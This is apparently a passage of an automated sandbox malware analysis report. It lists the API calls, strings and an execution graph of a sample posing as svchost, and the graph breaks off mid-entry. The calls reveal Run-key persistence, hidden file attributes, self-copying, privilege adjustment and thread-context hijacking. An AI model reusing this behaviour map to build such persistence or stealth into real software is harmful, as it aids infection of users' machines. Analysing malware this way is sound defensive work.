                                                                                                                                                                                                  • Instruction ID: 15a128c90526c1afb7aab3c2965dbe5aed3c3f402ab572140ae67f1b4e50f291
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C101CC26A1CA43C2E721EB21E88826D6370FFE8B45F511139E98EE2664DE6CD58DC610
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                                                  • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                  • Instruction ID: 7f24de335b6f0dc8c1d93a027c660ad14ee291507be28fe22535a50bd0305579
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D31A67661CAC1C5D670DB19E4987AEA3B0FB98740F400229DA8DD3B68EF3DD554CB10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF68DEA3784
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3744: GetVolumeInformationW.KERNELBASE ref: 00007FF68DEA3801
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3744: wsprintfW.USER32 ref: 00007FF68DEA38A2
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA390D
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3922
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3935
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3945
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3958
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA396D
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3980
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3995
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF68DEA3AB9
                                                                                                                                                                                                  • DeleteFileW.KERNEL32 ref: 00007FF68DEA3AC4
                                                                                                                                                                                                  • CopyFileW.KERNEL32 ref: 00007FF68DEA3ADD
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 00007FF68DEA3AF5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: Services
                                                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                                                  • Opcode ID: 311e9769a5f9042a1c4d1274615ef5c6319402c3cf93bf79ed3cbc3423f0458e
                                                                                                                                                                                                  • Instruction ID: 5734ac01ae76ccfe2850fa3f26ecf3067400e83cdd398f7d4ae9afe04282796b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 311e9769a5f9042a1c4d1274615ef5c6319402c3cf93bf79ed3cbc3423f0458e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75018461B18983D2EB60EB24E4993AA53B0FFA4744F90443AD24DC35A8FE2CD60DCB10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                                                  • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                  • Instruction ID: 1acb518866e53ac031391ee25a1ae793994fa991a5aaa783e6714997e4b0282e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3012976618A81CAD750DF14F84871AB7B4FB98794F801229EB8D83B68EF7CC149CB10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                                                  • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                  • Instruction ID: 41f71ba94eb4d8273bc1e4196d4eaeb05e8b2b7a57b838ea78c5fad680b4a412
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E116336628B41C6D7909B54F48462A77A0FB947A0F105334F9AE93BE8EF7CD049CB10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA390D
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3922
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3935
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3945
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3958
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA396D
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3980
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3995
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA46E4: CreateFileW.KERNELBASE ref: 00007FF68DEA472B
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: GetCurrentProcess.KERNEL32 ref: 00007FF68DEA414B
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: OpenProcessToken.ADVAPI32 ref: 00007FF68DEA415E
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF68DEA4186
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: AdjustTokenPrivileges.KERNELBASE ref: 00007FF68DEA41B1
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: CloseHandle.KERNEL32 ref: 00007FF68DEA41BC
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: OpenProcess.KERNEL32 ref: 00007FF68DEA41D1
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: CloseHandle.KERNEL32 ref: 00007FF68DEA4249
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF68DEA3037
                                                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF68DEA304A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                  • API String ID: 3992431006-2286007224
                                                                                                                                                                                                  • Opcode ID: 66002f7cc1a048e7c990725712f415c121466e6a21f61a925546d1bd52d36aeb
                                                                                                                                                                                                  • Instruction ID: 7a8b3c30e32011f90bd63dde54b8ba7225fb7d54ddbd0c3671fb8ad49ede45eb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66002f7cc1a048e7c990725712f415c121466e6a21f61a925546d1bd52d36aeb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0711C534A28A83C5E710EB54E88D3A967B0FFA4704F504139D54CE66A5FF7CA05DCB60

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:2.7%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:10.2%
                                                                                                                                                                                                  Total number of Nodes:413
                                                                                                                                                                                                  Total number of Limit Nodes:50
                                                                                                                                                                                                  execution_graph 38830 c5b8750 38831 c5b8789 VirtualProtect 38830->38831 38832 c5b8781 38830->38832 38833 c5b87ae VirtualProtect 38831->38833 38834 c5b87a4 38831->38834 38832->38831 38836 c5e0108 38833->38836 38837 c5b880f FlushInstructionCache 38836->38837 38837->38834 38838 c5b8b50 38855 c5b8860 38838->38855 38840 c5b8ca2 _DllMainCRTStartup 38867 c5ce110 38840->38867 38842 c5b8cd2 38843 c5b8b7a _DllMainCRTStartup 38843->38840 38860 c5b7930 38843->38860 38847 c5b8be2 38848 c5b8bea 38847->38848 38849 c5b8c95 38847->38849 38864 c5b84d0 HeapAlloc HeapReAlloc 38848->38864 38866 c5b7a90 VirtualFree VirtualFree 38849->38866 38852 c5b8bef 38854 c5b8bfb 38852->38854 38865 c5b7a90 VirtualFree VirtualFree 38852->38865 38854->38840 38856 c5b88a1 38855->38856 38857 c5b887d Sleep 38855->38857 38856->38843 38857->38856 38874 c5b7b10 GetSystemInfo 38860->38874 38862 c5b7939 38862->38840 38863 c5b9060 4 API calls 2 library calls 38862->38863 38863->38847 38864->38852 38865->38854 38866->38840 38870 c5ce119 38867->38870 38868 c5ce674 IsProcessorFeaturePresent 38871 c5ce68b 38868->38871 38869 c5ce124 38869->38842 38870->38868 38870->38869 38876 c5d4f48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38871->38876 38873 c5ce69e 38873->38842 38875 c5b7b45 _DllMainCRTStartup 38874->38875 38875->38862 38876->38873 38877 c5b17f0 38922 c5b2660 38877->38922 38879 c5b1865 38880 c5b2660 46 API calls 38879->38880 38881 c5b1870 38880->38881 38931 c5cd80c 38881->38931 38884 c5b189d _cftoa_l 38886 c5b18ba SHGetFolderPathA lstrcatA lstrcatA PathFileExistsA lstrcmpiA 38884->38886 38885 c5b1891 lstrcpyA 38885->38884 38887 c5b1929 lstrcmpiA 38886->38887 38888 c5b19a1 lstrcatA 38886->38888 38887->38888 38890 c5b193d lstrcmpiA 38887->38890 38889 c5b19be lstrcmpiA lstrcmpiA 38888->38889 38891 c5b19ec 38889->38891 38892 c5b19f1 38889->38892 38890->38888 38893 c5b1951 lstrcmpiA 38890->38893 38894 c5b19f5 PathFindFileNameW CreateThread 38891->38894 38892->38894 38895 c5b1a1b 38892->38895 38893->38888 38896 c5b1965 lstrcmpiA 38893->38896 38894->38895 38948 c5b2720 38895->38948 38896->38888 38897 c5b1979 lstrcmpiA 38896->38897 38897->38888 38898 c5b198d lstrcmpiA 38897->38898 38898->38888 38898->38889 38900 c5b1c1d 38959 c5cd7cc 8 API calls 2 library calls 38900->38959 38901 c5b1a33 38901->38900 38903 c5b1aa5 38901->38903 38904 c5b1ac6 _cftoa_l 38903->38904 38957 c5b17a0 GetNativeSystemInfo IsWow64Process 38903->38957 38910 c5b1af9 wsprintfA CreateFileA WriteFile WriteFile 38904->38910 38905 c5b1c25 38960 c5cd7cc 8 API calls 2 library calls 38905->38960 38908 c5b1c2d 38961 c5cd7cc 8 API calls 2 library calls 38908->38961 38909 c5b1ab4 38912 c5b1ab8 38909->38912 38913 c5b1ad3 TerminateProcess 38909->38913 38914 c5b1b8c 6 API calls 38910->38914 38915 c5b1c14 CloseHandle 38910->38915 38958 c5b1370 56 API calls 5 library calls 38912->38958 38913->38904 38914->38915 38915->38900 38916 c5b1c35 38962 c5cd7cc 8 API calls 2 library calls 38916->38962 38919 c5b1c3e 38920 c5ce110 _cftoe2_l 4 API calls 38919->38920 38921 c5b1c50 38920->38921 38923 c5b266e 38922->38923 38924 c5b2676 WideCharToMultiByte 38922->38924 38923->38879 38925 c5b26af 38924->38925 38926 c5b26c1 38924->38926 38925->38879 38927 c5cd80c malloc 44 API calls 38926->38927 38928 c5b26d0 38927->38928 38929 c5b26d8 WideCharToMultiByte 38928->38929 38930 c5b2702 38928->38930 38929->38930 38930->38879 38932 c5cd8a0 38931->38932 38944 c5cd824 38931->38944 38969 c5d0e88 DecodePointer 38932->38969 38934 c5cd85c HeapAlloc 38934->38944 38947 c5cd895 38934->38947 38935 c5cd8a5 38970 c5cf5b0 8 API calls _getptd_noexit 38935->38970 38938 c5b187d PathFindFileNameA 38938->38884 38938->38885 38939 c5cd885 38967 c5cf5b0 8 API calls _getptd_noexit 38939->38967 38943 c5cd88a 38968 c5cf5b0 8 API calls _getptd_noexit 38943->38968 38944->38934 38944->38939 38944->38943 38963 c5d09b4 40 API calls 2 library calls 38944->38963 38964 c5d0a28 40 API calls 6 library calls 38944->38964 38965 c5d0f08 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 38944->38965 38966 c5d0e88 DecodePointer 38944->38966 38947->38938 38949 c5b27bd 38948->38949 38950 c5b2734 MultiByteToWideChar 38948->38950 38949->38901 38951 c5b2769 38950->38951 38952 c5b275c 38950->38952 38953 c5cd80c malloc 44 API calls 38951->38953 38952->38901 38954 c5b277b 38953->38954 38955 c5b2793 MultiByteToWideChar 38954->38955 38956 c5b2783 38954->38956 38955->38949 38956->38901 38957->38909 38958->38904 38959->38905 38960->38908 38961->38916 38962->38919 38963->38944 38964->38944 38966->38944 38967->38943 38968->38947 38969->38935 38970->38938 38971 c5b8fe0 38972 c5b904f 38971->38972 38973 c5b8fef _DllMainCRTStartup 38971->38973 38974 c5b9038 HeapFree 38973->38974 38975 c5b901a ResumeThread CloseHandle 38973->38975 38976 c5b9033 38973->38976 38974->38972 38975->38973 38976->38974 38977 c5b8aa0 38984 c5b88b0 38977->38984 38979 c5b8acc _DllMainCRTStartup 38980 c5b8afc SuspendThread 38979->38980 38982 c5b8b23 38979->38982 38996 c5b8ea0 GetThreadContext 38980->38996 38995 c5b88d6 38984->38995 38985 c5b89b6 38986 c5ce110 _cftoe2_l 4 API calls 38985->38986 38987 c5b89c3 38986->38987 38987->38979 38988 c5b89ad CloseHandle 38988->38985 38989 c5b890b GetCurrentProcessId 38990 c5b8990 Thread32Next 38989->38990 38991 c5b8917 GetCurrentThreadId 38989->38991 38990->38988 38990->38995 38991->38990 38991->38995 38992 c5b892b HeapAlloc 38992->38988 38993 c5b894f 38992->38993 38993->38995 38994 c5b8959 HeapReAlloc 38994->38988 38994->38995 38995->38985 38995->38988 38995->38989 38995->38990 38995->38992 38995->38994 38999 c5b8ee2 _DllMainCRTStartup 38996->38999 39000 c5b8fab 38996->39000 38997 c5ce110 _cftoe2_l 4 API calls 38998 c5b8b13 CloseHandle 38997->38998 38998->38979 38999->39000 39001 c5b8f84 SetThreadContext 38999->39001 39000->38997 39001->38999 39002 c5cf0b0 39003 c5cf0cc 39002->39003 39006 c5cf0d1 39002->39006 39016 c5d681c GetSystemTimeAsFileTime GetCurrentThreadId GetTickCount64 GetTickCount64 QueryPerformanceCounter 39003->39016 39005 c5cf15c 39013 c5cf126 39005->39013 39018 c5cb6d0 39005->39018 39006->39005 39006->39013 39017 c5cef58 96 API calls 15 library calls 39006->39017 39008 c5cf17a 39009 c5cf1a3 39008->39009 39012 c5cb6d0 _DllMainCRTStartup 490 API calls 39008->39012 39009->39013 39028 c5cef58 96 API calls 15 library calls 39009->39028 39014 c5cf196 39012->39014 39027 c5cef58 96 API calls 15 library calls 39014->39027 39016->39006 39017->39005 39019 c5cb6d8 39018->39019 39020 c5cb6f0 _DllMainCRTStartup 39018->39020 39021 c5cb6fc 39019->39021 39029 c5b5590 LoadLibraryA GetProcAddress 39019->39029 39077 c5b8e20 24 API calls _DllMainCRTStartup 39020->39077 39021->39008 39023 c5cb6e1 39044 c5cb510 39023->39044 39027->39009 39028->39013 39030 c5b619d 13 API calls 39029->39030 39031 c5b62a3 156 API calls 39030->39031 39078 c5bf620 MultiByteToWideChar MultiByteToWideChar 39031->39078 39033 c5b7173 39079 c5bf620 MultiByteToWideChar MultiByteToWideChar 39033->39079 39035 c5b7186 39080 c5bf620 MultiByteToWideChar MultiByteToWideChar 39035->39080 39037 c5b7199 39081 c5bf620 MultiByteToWideChar MultiByteToWideChar 39037->39081 39039 c5b71ac 39082 c5bf620 MultiByteToWideChar MultiByteToWideChar 39039->39082 39041 c5b71bf 39083 c5bf620 MultiByteToWideChar MultiByteToWideChar 39041->39083 39043 c5b71d2 39043->39023 39084 c5c5180 39044->39084 39047 c5cb5bd lstrcmpiA 39050 c5cb5db lstrcmpiA 39047->39050 39051 c5cb5d1 39047->39051 39048 c5cb57d 39086 c5cb4c0 CreateMutexA 39048->39086 39052 c5cb5ef 39050->39052 39053 c5cb5fb lstrcmpiA 39050->39053 39109 c5ca260 95 API calls _DllMainCRTStartup 39051->39109 39110 c5c9980 207 API calls 3 library calls 39052->39110 39055 c5cb61e lstrcmpiA 39053->39055 39056 c5cb60f 39053->39056 39054 c5cb589 39054->39047 39061 c5cb592 CreateThread 39054->39061 39057 c5cb641 lstrcmpiA 39055->39057 39058 c5cb632 39055->39058 39111 c5c9980 207 API calls 3 library calls 39056->39111 39062 c5cb664 lstrcmpiA 39057->39062 39063 c5cb655 39057->39063 39112 c5c9980 207 API calls 3 library calls 39058->39112 39091 c5b1c70 39061->39091 39295 c5c7600 39061->39295 39064 c5cb678 39062->39064 39065 c5cb689 CreateThread 39062->39065 39113 c5c9980 207 API calls 3 library calls 39063->39113 39114 c5c9980 207 API calls 3 library calls 39064->39114 39069 c5cb6aa 39065->39069 39073 c5ce110 _cftoe2_l 4 API calls 39069->39073 39075 c5cb6bc 39073->39075 39075->39008 39076 c5cb687 39076->39069 39077->39021 39078->39033 39079->39035 39080->39037 39081->39039 39082->39041 39083->39043 39085 c5c518c GetModuleFileNameA PathFindFileNameA lstrcmpiA 39084->39085 39085->39047 39085->39048 39087 c5cb4ee GetLastError 39086->39087 39088 c5cb4de CloseHandle 39086->39088 39089 c5cb4e6 39087->39089 39090 c5cb4fb CloseHandle 39087->39090 39088->39089 39089->39054 39090->39054 39115 c5bf170 39091->39115 39095 c5b1cab _DllMainCRTStartup 39133 c5b8db0 39095->39133 39097 c5b1cc8 39139 c5b8ce0 GetModuleHandleW GetProcAddress _DllMainCRTStartup 39097->39139 39099 c5b1ce9 39140 c5b8ce0 GetModuleHandleW GetProcAddress _DllMainCRTStartup 39099->39140 39101 c5b1d0a _DllMainCRTStartup 39102 c5ce110 _cftoe2_l 4 API calls 39101->39102 39103 c5b1d23 39102->39103 39104 c5c57d0 39103->39104 39148 c5c5630 39104->39148 39110->39053 39111->39055 39112->39057 39113->39062 39114->39076 39141 c5bf040 GetWindowsDirectoryW 39115->39141 39117 c5bf1c4 _DllMainCRTStartup 39118 c5bf1db 7 API calls 39117->39118 39119 c5ce110 _cftoe2_l 4 API calls 39118->39119 39120 c5b1c93 39119->39120 39121 c5bf3c0 CreateFileW 39120->39121 39122 c5bf403 39121->39122 39123 c5bf410 GetFileSize GetProcessHeap HeapAlloc 39121->39123 39122->39095 39124 c5bf452 ReadFile 39123->39124 39125 c5bf490 CloseHandle 39123->39125 39126 c5bf479 GetProcessHeap HeapFree 39124->39126 39127 c5bf46f 39124->39127 39128 c5bf53c 39125->39128 39126->39125 39127->39126 39130 c5bf49d _DllMainCRTStartup 39127->39130 39128->39095 39129 c5bf52b CloseHandle 39129->39128 39130->39129 39131 c5bf4e1 GetProcessHeap HeapAlloc 39130->39131 39132 c5bf4df _cftoe2_l 39130->39132 39131->39129 39131->39132 39132->39129 39134 c5b8860 _DllMainCRTStartup Sleep 39133->39134 39135 c5b8dbd 39134->39135 39136 c5b8e03 _DllMainCRTStartup 39135->39136 39137 c5b8dc6 HeapCreate 39135->39137 39136->39097 39138 c5b8ddf _DllMainCRTStartup 39137->39138 39138->39097 39139->39099 39140->39101 39142 c5bf09d GetVolumeInformationW 39141->39142 39144 c5bf0f2 _DllMainCRTStartup 39142->39144 39145 c5bf127 wsprintfW 39144->39145 39146 c5ce110 _cftoe2_l 4 API calls 39145->39146 39147 c5bf15b 39146->39147 39147->39117 39149 c5c5675 _cftoa_l 39148->39149 39150 c5c56dd GetUserNameW GetComputerNameW 39149->39150 39173 c5bf560 39150->39173 39152 c5c5715 39153 c5bf560 _DllMainCRTStartup 3 API calls 39152->39153 39154 c5c5724 GetNativeSystemInfo GetVersionExA wsprintfA 39153->39154 39180 c5b9450 39154->39180 39157 c5ce110 _cftoe2_l 4 API calls 39158 c5c57b6 39157->39158 39159 c5c51b0 39158->39159 39160 c5c51e0 lstrcpyA 39159->39160 39161 c5b9450 _DllMainCRTStartup 57 API calls 39160->39161 39162 c5c5221 _DllMainCRTStartup 39161->39162 39163 c5c52a7 free 39162->39163 39166 c5c5250 StrChrA StrStrA 39162->39166 39167 c5c5240 39162->39167 39273 c5f0888 39163->39273 39165 c5c52bb SleepEx 39169 c5c5279 39166->39169 39168 c5c5630 _DllMainCRTStartup 66 API calls 39167->39168 39170 c5c5245 39168->39170 39169->39163 39169->39166 39171 c5c5285 strtol 39169->39171 39170->39163 39262 c5c5520 39171->39262 39174 c5bf56e 39173->39174 39175 c5bf576 WideCharToMultiByte 39173->39175 39174->39152 39176 c5bf5af 39175->39176 39177 c5bf5c1 malloc 39175->39177 39176->39152 39178 c5bf5d8 WideCharToMultiByte 39177->39178 39179 c5bf602 39177->39179 39178->39179 39179->39152 39181 c5b95aa memcpy lstrlenA 39180->39181 39185 c5b948d __lock_fhandle _DllMainCRTStartup 39180->39185 39200 c5bf340 39181->39200 39186 c5b94ab lstrcpyA 39185->39186 39255 c5bef20 GetWindowsDirectoryA GetVolumeInformationA 39186->39255 39187 c5b962a 39190 c5bf340 _DllMainCRTStartup lstrlenA 39187->39190 39189 c5b94ec lstrcpyA lstrcatA lstrcatA 39192 c5b72c0 _DllMainCRTStartup 47 API calls 39189->39192 39193 c5b963f 39190->39193 39191 c5b95f1 39191->39187 39195 c5b72c0 _DllMainCRTStartup 47 API calls 39191->39195 39199 c5b955c 39192->39199 39194 c5ce110 _cftoe2_l 4 API calls 39193->39194 39197 c5b9664 free 39194->39197 39195->39191 39196 c5b958f _mtinitlocknum 39196->39181 39197->39157 39198 